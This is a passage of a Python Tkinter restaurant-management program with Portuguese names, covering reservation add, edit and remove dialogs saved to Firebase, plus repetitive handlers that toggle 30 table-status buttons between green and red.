825, y = 550)\r\n self.verde25f.place(x = 925, y = 550)\r\n self.verde26f.place(x = 525, y = 650)\r\n self.verde27f.place(x = 625, y = 650)\r\n self.verde28f.place(x = 725, y = 650)\r\n self.verde29f.place(x = 825, y = 650)\r\n self.verde30f.place(x = 925, y = 650)\r\n \r\n self.enderecotitle = tk.Label(self.mainwindow, text = \"Endereço: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.endereco = tk.Label(self.mainwindow, text = self.franquiaselecionada[\"Dados\"][\"Endereco\"], font = (\"verdana\", 10), bg = \"sandy brown\")\r\n \r\n self.enderecotitle.place(x = 1100, y = 750)\r\n self.endereco.place(x = 1170, y = 750)\r\n try:\r\n self.tablereservas.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Reservas\"]:\r\n self.tablereservas.insert(\"\", 1, \"\" , text = str(i), values = (self.franquiaselecionada[\"Reservas\"][str(i)][\"nome\"], self.franquiaselecionada[\"Reservas\"][str(i)][\"horario\"], self.franquiaselecionada[\"Reservas\"][str(i)][\"status\"], self.franquiaselecionada[\"Reservas\"][str(i)][\"mesa\"]), tags = (\"Cor\"))\r\n self.tablereservas.configure(height = len(self.tablereservas.get_children()))\r\n except:\r\n pass\r\n \r\n \r\n \r\n \r\n \r\n def removereserva(self):\r\n self.removerreservas = tk.Toplevel()\r\n self.removerreservas.wm_title(\"Remover Reserva\")\r\n self.removerreservas.geometry(\"400x300\")\r\n self.removerreservas.configure(bg = \"sandy brown\")\r\n self.ridmesa = tk.Label(self.removerreservas, text = \"ID da reserva: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.ridmesaentry = tk.Entry(self.removerreservas, bg = \"peru\")\r\n self.ridmesa.place(x = 50, y = 40)\r\n self.ridmesaentry.place(x = 190, y = 40)\r\n self.bcancelarremoverreserva = tk.Button(self.removerreservas , bg = \"peru\",fg = \"black\", font = (\"verdana\", 10), text = \"Cancelar\", command = self.cancelarinserirreserva, height= 2, width = 20)\r\n self.bcancelarremoverreserva.place(x=10, y= 250 )\r\n self.bremoverreservar = tk.Button(self.removerreservas , bg = \"peru\",fg = \"black\", font = (\"verdana\", 10), text = \"Remover\", command = self.removerreservatabela, height= 2, width = 20)\r\n self.bremoverreservar.place(x = 220, y = 250)\r\n \r\n def removerreservatabela(self):\r\n del self.franquiaselecionada[\"Reservas\"][self.ridmesaentry.get()]\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.tablereservas.delete(*self.tablereservas.get_children())\r\n self.removerreservas.destroy()\r\n try:\r\n self.tablereservas.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Reservas\"]:\r\n self.tablereservas.insert(\"\", 1, \"\" , text = str(i), values = (self.franquiaselecionada[\"Reservas\"][str(i)][\"nome\"], self.franquiaselecionada[\"Reservas\"][str(i)][\"horario\"], self.franquiaselecionada[\"Reservas\"][str(i)][\"status\"], self.franquiaselecionada[\"Reservas\"][str(i)][\"mesa\"]), tags = (\"Cor\"))\r\n self.tablereservas.configure(height = len(self.tablereservas.get_children()))\r\n except:\r\n pass\r\n \r\n \r\n def editarreserva(self):\r\n self.janelaeditar = tk.Toplevel()\r\n self.janelaeditar.wm_title(\"Editar Reserva\")\r\n self.janelaeditar.geometry(\"400x300\")\r\n self.janelaeditar.configure(bg = \"sandy brown\")\r\n self.idmesae = tk.Label(self.janelaeditar, text = \"ID da reserva: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.idmesaentrye = tk.Entry(self.janelaeditar, bg = \"peru\")\r\n self.idmesae.place(x = 50, y = 40)\r\n self.idmesaentrye.place(x = 190, y = 40)\r\n self.bselecionarid = tk.Button(self.janelaeditar, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Selecionar ID\", command = self.editarreservaselecionada, height= 2, width = 20)\r\n self.bselecionarid.place(x = 110, y = 100)\r\n \r\n \r\n def editarreservaselecionada(self):\r\n if self.idmesaentrye.get() in self.franquiaselecionada[\"Reservas\"]:\r\n self.idmesae.destroy()\r\n self.bselecionarid.destroy()\r\n self.numeromesaee = tk.Label(self.janelaeditar, text = \"Número da mesa: \", bg = \"sandy brown\", font = (\"verdana\",10))\r\n self.numeromesaentryee = tk.Entry(self.janelaeditar, bg = \"peru\")\r\n self.nomemesaee = tk.Label(self.janelaeditar, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomemesaentryee = tk.Entry(self.janelaeditar, bg = \"peru\")\r\n self.statusmesaee = tk.Label(self.janelaeditar, text = \"Origem da reserva: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.statusmesaentryee = tk.Entry(self.janelaeditar, bg = \"peru\")\r\n self.horariomesaee = tk.Label(self.janelaeditar, text = \"Horário: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.horariomesaentryee = tk.Entry(self.janelaeditar, bg = \"peru\")\r\n self.idmesaee = tk.Label(self.janelaeditar, text = \"ID: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.idmesaentryee = tk.Entry(self.janelaeditar, bg = \"peru\")\r\n self.nomemesaee.place(x = 50, y = 40)\r\n self.nomemesaentryee.place(x = 190, y = 40)\r\n self.numeromesaee.place(x = 50, y = 70)\r\n self.numeromesaentryee.place(x = 190, y = 70)\r\n self.statusmesaee.place(x = 50, y = 100)\r\n self.statusmesaentryee.place(x = 190, y = 100)\r\n self.horariomesaee.place(x = 50, y = 130)\r\n self.horariomesaentryee.place(x = 190, y = 130)\r\n self.idmesaee.place(x=50, y = 160)\r\n self.idmesaentryee.place(x = 190, y = 160)\r\n \r\n self.idmesaentryee.insert(0, self.idmesaentrye.get())\r\n self.idmesaentryee.configure(state = \"disabled\")\r\n self.horariomesaentryee.insert(0, self.franquiaselecionada[\"Reservas\"][self.idmesaentrye.get()][\"horario\"])\r\n self.statusmesaentryee.insert(0, self.franquiaselecionada[\"Reservas\"][self.idmesaentrye.get()][\"status\"])\r\n self.numeromesaentryee.insert(0, self.franquiaselecionada[\"Reservas\"][self.idmesaentrye.get()][\"mesa\"])\r\n self.nomemesaentryee.insert(0, self.franquiaselecionada[\"Reservas\"][self.idmesaentrye.get()][\"nome\"])\r\n self.binserirreservae = tk.Button(self.janelaeditar, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Adicionar\", command = self.editartabelareserva, height= 2, width = 20)\r\n self.bcancelarinserrirreservae = tk.Button(self.janelaeditar, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Cancelar\", command = self.cancelareditarreserva, height= 2, width = 20)\r\n self.bcancelarinserrirreservae.place(x=10, y= 250 )\r\n self.binserirreservae.place(x =220, y = 250)\r\n else:\r\n self.janelaeditar.destroy()\r\n self.janelaerroedicao()\r\n \r\n \r\n \r\n \r\n \r\n \r\n def editartabelareserva(self):\r\n self.franquiaselecionada[\"Reservas\"][self.idmesaentryee.get()] = {\"nome\": self.nomemesaentryee.get(), \"horario\": self.horariomesaentryee.get(), \"status\": self.statusmesaentryee.get(), \"mesa\": self.numeromesaentryee.get()}\r\n firebase.patch(self.selecionada, self.franquiaselecionada) \r\n try:\r\n self.tablereservas.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.tablereservas.delete(*self.tablereservas.get_children())\r\n for i in self.franquiaselecionada[\"Reservas\"]:\r\n self.tablereservas.insert(\"\", 1, \"\" , text = str(i), values = (self.franquiaselecionada[\"Reservas\"][str(i)][\"nome\"], self.franquiaselecionada[\"Reservas\"][str(i)][\"horario\"], self.franquiaselecionada[\"Reservas\"][str(i)][\"status\"], self.franquiaselecionada[\"Reservas\"][str(i)][\"mesa\"]), tags = (\"Cor\"))\r\n self.tablereservas.configure(height = len(self.tablereservas.get_children()))\r\n except:\r\n pass\r\n \r\n self.janelaeditar.destroy()\r\n \r\n def cancelareditarreserva(self):\r\n self.janelaeditar.destroy()\r\n def adicionarreserva(self):\r\n self.janelareservas = tk.Toplevel()\r\n self.janelareservas.wm_title(\"Janela de reserva\")\r\n self.janelareservas.geometry(\"400x300\")\r\n self.janelareservas.configure(bg = \"sandy brown\")\r\n self.numeromesa = tk.Label(self.janelareservas, text = \"Número da mesa: \", bg = \"sandy brown\", font = (\"verdana\",10))\r\n self.numeromesaentry = tk.Entry(self.janelareservas, bg = \"peru\")\r\n self.nomemesa = tk.Label(self.janelareservas, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomemesaentry = tk.Entry(self.janelareservas, bg = \"peru\")\r\n self.statusmesa = tk.Label(self.janelareservas, text = \"Origem da reserva: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.statusmesaentry = tk.Entry(self.janelareservas, bg = \"peru\")\r\n self.horariomesa = tk.Label(self.janelareservas, text = \"Horário: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.horariomesaentry = tk.Entry(self.janelareservas, bg = \"peru\")\r\n self.idmesa = tk.Label(self.janelareservas, text = \"ID: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.idmesaentry = tk.Entry(self.janelareservas, bg = \"peru\")\r\n self.nomemesa.place(x = 50, y = 40)\r\n self.nomemesaentry.place(x = 190, y = 40)\r\n self.numeromesa.place(x = 50, y = 70)\r\n self.numeromesaentry.place(x = 190, y = 70)\r\n self.statusmesa.place(x = 50, y = 100)\r\n self.statusmesaentry.place(x = 190, y = 100)\r\n self.horariomesa.place(x = 50, y = 130)\r\n self.horariomesaentry.place(x = 190, y = 130)\r\n self.idmesa.place(x=50, y = 160)\r\n self.idmesaentry.place(x = 190, y = 160)\r\n self.binserirreserva = tk.Button(self.janelareservas, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Adicionar\", command = self.inserirreserva, height= 2, width = 20)\r\n self.bcancelarinserrirreserva = tk.Button(self.janelareservas, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Cancelar\", command = self.cancelaraddrreserva, height= 2, width = 20)\r\n self.bcancelarinserrirreserva.place(x=10, y= 250 )\r\n self.binserirreserva.place(x =220, y = 250)\r\n \r\n def cancelaraddrreserva(self):\r\n self.janelareservas.destroy()\r\n \r\n def inserirreserva(self):\r\n if len(self.tablereservas.get_children()) < 16:\r\n self.tablereservas.insert(\"\", 1, \"\" , text = self.idmesaentry.get(), values = (self.nomemesaentry.get(), self.horariomesaentry.get(), self.statusmesaentry.get(), self.numeromesaentry.get()), tags = (\"Cor\"))\r\n self.tablereservas.configure(height = len(self.tablereservas.get_children()))\r\n self.tablereservas.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.franquiaselecionada[\"Reservas\"][str(self.idmesaentry.get())] = {\"nome\": self.nomemesaentry.get(), \"horario\": self.horariomesaentry.get(), \"status\": self.statusmesaentry.get(), \"mesa\": self.numeromesaentry.get()}\r\n self.franquiaselecionada[\"Dados\"][\"NReservas\"] += 1\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelareservas.destroy()\r\n else:\r\n self.janelareservas.destroy()\r\n self.errotabela()\r\n \r\n def errotabela(self):\r\n \r\n self.errotabela = tk.Toplevel()\r\n self.errotabela .wm_title(\"Erro\")\r\n self.errotabela .geometry(\"400x100\")\r\n self.errotabela.configure(bg = \"indian red\")\r\n self.errotabelatext = tk.Label(self.errotabela, text = \"Número máximo de dados atingido! \", bg = \"indian red\", font = (\"verdana\",10))\r\n self.sairerror = tk.Button(self.errotabela, bg = \"grey\", fg = \"black\", font = (\"verdana\", 10), text = \"Ok\", command = self.sairerrotabela, height= 1, width = 10)\r\n self.errotabelatext.place(x = 80, y = 30)\r\n self.sairerror.place(x= 150, y = 60 )\r\n \r\n def sairerrotabela(self):\r\n self.errotabela.destroy()\r\n \r\n def cancelarinserirreserva(self):\r\n self.removerreservas.destroy()\r\n \r\n def vermelhot1(self):\r\n self.verde1f.destroy()\r\n self.vermelho1f = tk.Button(self.mainwindow, image = self.vermelho1, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet1)\r\n self.vermelho1f.place(x = 525, y = 150)\r\n \r\n def vermelhot2(self):\r\n self.verde2f.destroy()\r\n self.vermelho2f = tk.Button(self.mainwindow, image = self.vermelho2, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet2)\r\n self.vermelho2f.place(x = 625, y = 150)\r\n \r\n def vermelhot3(self):\r\n self.verde3f.destroy()\r\n self.vermelho3f = tk.Button(self.mainwindow, image = self.vermelho3, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet3)\r\n self.vermelho3f.place(x = 725, y = 150)\r\n \r\n def vermelhot4(self):\r\n self.verde4f.destroy()\r\n self.vermelho4f = tk.Button(self.mainwindow, image = self.vermelho4, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet4)\r\n self.vermelho4f.place(x = 825, y = 150)\r\n \r\n def vermelhot5(self):\r\n self.verde5f.destroy()\r\n self.vermelho5f = tk.Button(self.mainwindow, image = self.vermelho5, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet5)\r\n self.vermelho5f.place(x = 925, y = 150)\r\n \r\n def vermelhot6(self):\r\n self.verde6f.destroy()\r\n self.vermelho6f = tk.Button(self.mainwindow, image = self.vermelho6, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet6)\r\n self.vermelho6f.place(x = 525, y = 250)\r\n \r\n def vermelhot7(self):\r\n self.verde7f.destroy()\r\n self.vermelho7f = tk.Button(self.mainwindow, image = self.vermelho7, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet7)\r\n self.vermelho7f.place(x = 625, y = 250)\r\n \r\n def vermelhot8(self):\r\n self.verde8f.destroy()\r\n self.vermelho8f = tk.Button(self.mainwindow, image = self.vermelho8, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet8)\r\n self.vermelho8f.place(x = 725, y = 250)\r\n \r\n def vermelhot9(self):\r\n self.verde9f.destroy()\r\n self.vermelho9f = tk.Button(self.mainwindow, image = self.vermelho9, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet9)\r\n self.vermelho9f.place(x = 825, y = 250)\r\n \r\n def vermelhot10(self):\r\n self.verde10f.destroy()\r\n self.vermelho10f = tk.Button(self.mainwindow, image = self.vermelho10, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet10)\r\n self.vermelho10f.place(x = 925, y = 250)\r\n \r\n def vermelhot11(self):\r\n self.verde11f.destroy()\r\n self.vermelho11f = tk.Button(self.mainwindow, image = self.vermelho11, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet11)\r\n self.vermelho11f.place(x = 525, y = 350)\r\n \r\n def vermelhot12(self):\r\n self.verde12f.destroy()\r\n self.vermelho12f = tk.Button(self.mainwindow, image = self.vermelho12, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet12)\r\n self.vermelho12f.place(x = 625, y = 350)\r\n \r\n def vermelhot13(self):\r\n self.verde13f.destroy()\r\n self.vermelho13f = tk.Button(self.mainwindow, image = self.vermelho13, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet13)\r\n self.vermelho13f.place(x = 725, y = 350)\r\n \r\n def vermelhot14(self):\r\n self.verde14f.destroy()\r\n self.vermelho14f = tk.Button(self.mainwindow, image = self.vermelho14, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet14)\r\n self.vermelho14f.place(x = 825, y = 350)\r\n \r\n def vermelhot15(self):\r\n self.verde15f.destroy()\r\n self.vermelho15f = tk.Button(self.mainwindow, image = self.vermelho15, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet15)\r\n self.vermelho15f.place(x = 925, y = 350)\r\n \r\n def vermelhot16(self):\r\n self.verde16f.destroy()\r\n self.vermelho16f = tk.Button(self.mainwindow, image = self.vermelho16, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet16)\r\n self.vermelho16f.place(x = 525, y = 450)\r\n \r\n def vermelhot17(self):\r\n self.verde17f.destroy()\r\n self.vermelho17f = tk.Button(self.mainwindow, image = self.vermelho17, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet17)\r\n self.vermelho17f.place(x = 625, y = 450)\r\n \r\n def vermelhot18(self):\r\n self.verde18f.destroy()\r\n self.vermelho18f = tk.Button(self.mainwindow, image = self.vermelho18, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet18)\r\n self.vermelho18f.place(x = 725, y = 450)\r\n \r\n def vermelhot19(self):\r\n self.verde19f.destroy()\r\n self.vermelho19f = tk.Button(self.mainwindow, image = self.vermelho19, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet19)\r\n self.vermelho19f.place(x = 825, y = 450)\r\n \r\n def vermelhot20(self):\r\n self.verde20f.destroy()\r\n self.vermelho20f = tk.Button(self.mainwindow, image = self.vermelho20, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet20)\r\n self.vermelho20f.place(x = 925, y = 450)\r\n \r\n def vermelhot21(self):\r\n self.verde21f.destroy()\r\n self.vermelho21f = tk.Button(self.mainwindow, image = self.vermelho21, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet21)\r\n self.vermelho21f.place(x = 525, y = 550)\r\n \r\n def vermelhot22(self):\r\n self.verde22f.destroy()\r\n self.vermelho22f = tk.Button(self.mainwindow, image = self.vermelho22, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet22)\r\n self.vermelho22f.place(x = 625, y = 550)\r\n \r\n def vermelhot23(self):\r\n self.verde23f.destroy()\r\n self.vermelho23f = tk.Button(self.mainwindow, image = self.vermelho23, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet23)\r\n self.vermelho23f.place(x = 725, y = 550)\r\n \r\n def vermelhot24(self):\r\n self.verde24f.destroy()\r\n self.vermelho24f = tk.Button(self.mainwindow, image = self.vermelho24, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet24)\r\n self.vermelho24f.place(x = 825, y = 550)\r\n \r\n def vermelhot25(self):\r\n self.verde25f.destroy()\r\n self.vermelho25f = tk.Button(self.mainwindow, image = self.vermelho25, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet25)\r\n self.vermelho25f.place(x = 925, y = 550)\r\n \r\n def vermelhot26(self):\r\n self.verde26f.destroy()\r\n self.vermelho26f = tk.Button(self.mainwindow, image = self.vermelho26, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet26)\r\n self.vermelho26f.place(x = 525, y = 650)\r\n \r\n def vermelhot27(self):\r\n self.verde27f.destroy()\r\n self.vermelho27f = tk.Button(self.mainwindow, image = self.vermelho27, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet27)\r\n self.vermelho27f.place(x = 625, y = 650)\r\n \r\n def vermelhot28(self):\r\n self.verde28f.destroy()\r\n self.vermelho28f = tk.Button(self.mainwindow, image = self.vermelho28, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet28)\r\n self.vermelho28f.place(x = 725, y = 650)\r\n \r\n def vermelhot29(self):\r\n self.verde29f.destroy()\r\n self.vermelho29f = tk.Button(self.mainwindow, image = self.vermelho29, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet29)\r\n self.vermelho29f.place(x = 825, y = 650)\r\n \r\n def vermelhot30(self):\r\n self.verde30f.destroy()\r\n self.vermelho30f = tk.Button(self.mainwindow, image = self.vermelho30, height = 50, width= 76, bg = \"sandy brown\", command = self.verdet30)\r\n self.vermelho30f.place(x = 925, y = 650)\r\n \r\n\r\n \r\n \r\n def verdet1(self):\r\n self.vermelho1f.destroy()\r\n self.verde1f = tk.Button(self.mainwindow, image = self.verde1, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot1)\r\n self.verde1f.place(x = 525, y = 150)\r\n \r\n def verdet2(self):\r\n self.vermelho2f.destroy()\r\n self.verde2f = tk.Button(self.mainwindow, image = self.verde2, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot2)\r\n self.verde2f.place(x = 625, y = 150)\r\n \r\n def verdet3(self):\r\n self.vermelho3f.destroy()\r\n self.verde3f = tk.Button(self.mainwindow, image = self.verde3, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot3)\r\n self.verde3f.place(x = 725, y = 150)\r\n \r\n def verdet4(self):\r\n self.vermelho4f.destroy()\r\n self.verde4f = tk.Button(self.mainwindow, image = self.verde4, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot4)\r\n self.verde4f.place(x = 825, y = 150)\r\n \r\n def verdet5(self):\r\n self.vermelho5f.destroy()\r\n self.verde5f = tk.Button(self.mainwindow, image = self.verde5, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot5)\r\n self.verde5f.place(x = 925, y = 150)\r\n \r\n def verdet6(self):\r\n self.vermelho6f.destroy()\r\n self.verde6f = tk.Button(self.mainwindow, image = self.verde6, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot6)\r\n self.verde6f.place(x = 525, y = 250)\r\n \r\n def verdet7(self):\r\n self.vermelho7f.destroy()\r\n self.verde7f = tk.Button(self.mainwindow, image = self.verde7, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot7)\r\n self.verde7f.place(x = 625, y = 250)\r\n \r\n def verdet8(self):\r\n self.vermelho8f.destroy()\r\n self.verde8f = tk.Button(self.mainwindow, image = self.verde8, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot8)\r\n self.verde8f.place(x = 725, y = 250)\r\n \r\n def verdet9(self):\r\n self.vermelho9f.destroy()\r\n self.verde9f = tk.Button(self.mainwindow, image = self.verde9, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot9)\r\n self.verde9f.place(x = 825, y = 250)\r\n \r\n def verdet10(self):\r\n self.vermelho10f.destroy()\r\n self.verde10f = tk.Button(self.mainwindow, image = self.verde10, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot10)\r\n self.verde10f.place(x = 925, y = 250)\r\n \r\n def verdet11(self):\r\n self.vermelho11f.destroy()\r\n self.verde11f = tk.Button(self.mainwindow, image = self.verde11, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot11)\r\n self.verde11f.place(x = 525, y = 350)\r\n \r\n def verdet12(self):\r\n self.vermelho12f.destroy()\r\n self.verde12f = tk.Button(self.mainwindow, image = self.verde12, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot12)\r\n self.verde12f.place(x = 625, y = 350)\r\n \r\n def verdet13(self):\r\n self.vermelho13f.destroy()\r\n self.verde13f = tk.Button(self.mainwindow, image = self.verde13, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot13)\r\n self.verde13f.place(x = 725, y = 350)\r\n \r\n def verdet14(self):\r\n self.vermelho14f.destroy()\r\n self.verde14f = tk.Button(self.mainwindow, image = self.verde14, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot14)\r\n self.verde14f.place(x = 825, y = 350)\r\n \r\n def verdet15(self):\r\n self.vermelho15f.destroy()\r\n self.verde15f = tk.Button(self.mainwindow, image = self.verde15, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot15)\r\n self.verde15f.place(x = 925, y = 350)\r\n \r\n def verdet16(self):\r\n self.vermelho16f.destroy()\r\n self.verde16f = tk.Button(self.mainwindow, image = self.verde16, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot16)\r\n self.verde16f.place(x = 525, y = 450)\r\n \r\n def verdet17(self):\r\n self.vermelho17f.destroy()\r\n self.verde17f = tk.Button(self.mainwindow, image = self.verde17, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot17)\r\n self.verde17f.place(x = 625, y = 450)\r\n \r\n def verdet18(self):\r\n self.vermelho18f.destroy()\r\n self.verde18f = tk.Button(self.mainwindow, image = self.verde18, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot18)\r\n self.verde18f.place(x = 725, y = 450)\r\n \r\n def verdet19(self):\r\n self.vermelho19f.destroy()\r\n self.verde19f = tk.Button(self.mainwindow, image = self.verde19, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot19)\r\n self.verde19f.place(x = 825, y = 450)\r\n \r\n def verdet20(self):\r\n self.vermelho20f.destroy()\r\n self.verde20f = tk.Button(self.mainwindow, image = self.verde20, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot20)\r\n self.verde20f.place(x = 925, y = 450)\r\n\r\n def verdet21(self):\r\n self.vermelho21f.destroy()\r\n self.verde21f = tk.Button(self.mainwindow, image = self.verde21, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot21)\r\n self.verde21f.place(x = 525, y = 550)\r\n \r\n def verdet22(self):\r\n self.vermelho22f.destroy()\r\n self.verde22f = tk.Button(self.mainwindow, image = self.verde22, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot22)\r\n self.verde22f.place(x = 625, y = 550)\r\n \r\n def verdet23(self):\r\n self.vermelho23f.destroy()\r\n self.verde23f = tk.Button(self.mainwindow, image = self.verde23, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot23)\r\n self.verde23f.place(x = 725, y = 550)\r\n \r\n def verdet24(self):\r\n self.vermelho24f.destroy()\r\n self.verde24f = tk.Button(self.mainwindow, image = self.verde24, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot24)\r\n self.verde24f.place(x = 825, y = 550)\r\n \r\n def verdet25(self):\r\n self.vermelho25f.destroy()\r\n self.verde25f = tk.Button(self.mainwindow, image = self.verde25, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot25)\r\n self.verde25f.place(x = 925, y = 550)\r\n \r\n def verdet26(self):\r\n self.vermelho26f.destroy()\r\n self.verde26f = tk.Button(self.mainwindow, image = self.verde26, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot26)\r\n self.verde26f.place(x = 525, y = 650)\r\n \r\n def verdet27(self):\r\n self.vermelho27f.destroy()\r\n self.verde27f = tk.Button(self.mainwindow, image = self.verde27, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot27)\r\n self.verde27f.place(x = 625, y = 650)\r\n \r\n def verdet28(self):\r\n self.vermelho28f.destroy()\r\n self.verde28f = tk.Button(self.mainwindow, image = self.verde28, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot28)\r\n self.verde28f.place(x = 725, y = 650)\r\n \r\n def verdet29(self):\r\n self.vermelho29f.destroy()\r\n self.verde29f = tk.Button(self.mainwindow, image = self.verde29, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot29)\r\n self.verde29f.place(x = 825, y = 650)\r\n \r\n def verdet30(self):\r\n self.vermelho30f.destroy()\r\n self.verde30f = tk.Button(self.mainwindow, image = self.verde30, height = 50, width= 76, bg = \"sandy brown\", command = self.vermelhot30)\r\n self.verde30f.place(x = 925, y = 650)\r\n \r\n \r\n \r\n \r\n \r\n def selecionarcozinha(self):\r\n try:\r\n self.voicecommand4.destroy()\r\n except:\r\n pass\r\n# bob =ImageTk.PhotoImage(Image.open(\"fundo.png\"))\r\n# \r\n# self.imagembob = tk.Label(self.mainwindow, image = bob, height = 900, width= 1400, bg = \"sandy brown\")\r\n# self.imagembob.image = bob\r\n# self.imagembob.place(x = 100, y = 44)\r\n self.cozinha.configure(bg = \"black\", fg = \"white\")\r\n \r\n try:\r\n self.cozinha.configure(command = self.bloquear)\r\n self.adm.configure(command = self.selecionaradm)\r\n self.salao.configure(command = self.selecionarsalao)\r\n except:\r\n pass\r\n \r\n try:\r\n self.adm.configure(bg = \"peru\", fg = \"black\")\r\n except:\r\n pass\r\n \r\n try:\r\n self.salao.configure(bg = \"peru\", fg = \"black\")\r\n except:\r\n pass\r\n \r\n try:\r\n self.imagemslogosalao.destroy()\r\n self.voicecommand3.destroy()\r\n self.enderecotitle.destroy()\r\n self.endereco.destroy()\r\n self.verde1f.destroy()\r\n self.verde2f.destroy()\r\n self.verde3f.destroy()\r\n self.verde4f.destroy()\r\n self.verde5f.destroy()\r\n self.verde6f.destroy()\r\n self.verde7f.destroy()\r\n self.verde8f.destroy()\r\n self.verde9f.destroy()\r\n self.verde10f.destroy()\r\n self.verde11f.destroy()\r\n self.verde12f.destroy()\r\n self.verde13f.destroy()\r\n self.verde14f.destroy()\r\n self.verde15f.destroy()\r\n self.verde16f.destroy()\r\n self.verde17f.destroy()\r\n self.verde18f.destroy()\r\n self.verde19f.destroy()\r\n self.verde20f.destroy()\r\n self.verde21f.destroy()\r\n self.verde22f.destroy()\r\n self.verde23f.destroy()\r\n self.verde24f.destroy()\r\n self.verde25f.destroy()\r\n self.verde26f.destroy()\r\n self.verde27f.destroy()\r\n self.verde28f.destroy()\r\n self.verde29f.destroy()\r\n self.verde30f.destroy()\r\n self.vermelho1f.destroy()\r\n self.vermelho2f.destroy()\r\n self.vermelho3f.destroy()\r\n self.vermelho4f.destroy()\r\n self.vermelho5f.destroy()\r\n self.vermelho6f.destroy()\r\n self.vermelho7f.destroy()\r\n self.vermelho8f.destroy()\r\n self.vermelho9f.destroy()\r\n self.vermelho10f.destroy()\r\n self.vermelho11f.destroy()\r\n self.vermelho12f.destroy()\r\n self.vermelho13f.destroy()\r\n self.vermelho14f.destroy()\r\n self.vermelho15f.destroy()\r\n self.vermelho16f.destroy()\r\n self.vermelho17f.destroy()\r\n self.vermelho18f.destroy()\r\n self.vermelho19f.destroy()\r\n self.vermelho20f.destroy()\r\n self.vermelho21f.destroy()\r\n self.vermelho22f.destroy()\r\n self.vermelho23f.destroy()\r\n self.vermelho24f.destroy()\r\n self.vermelho25f.destroy()\r\n self.vermelho26f.destroy()\r\n self.vermelho27f.destroy()\r\n self.vermelho28f.destroy()\r\n self.vermelho29f.destroy()\r\n self.vermelho30f.destroy()\r\n self.reservas.destroy()\r\n self.tablereservas.destroy()\r\n self.badicionarreserva.destroy()\r\n self.beditareserva.destroy()\r\n self.bremoverreserva.destroy() \r\n self.bfuncionarios.destroy()\r\n 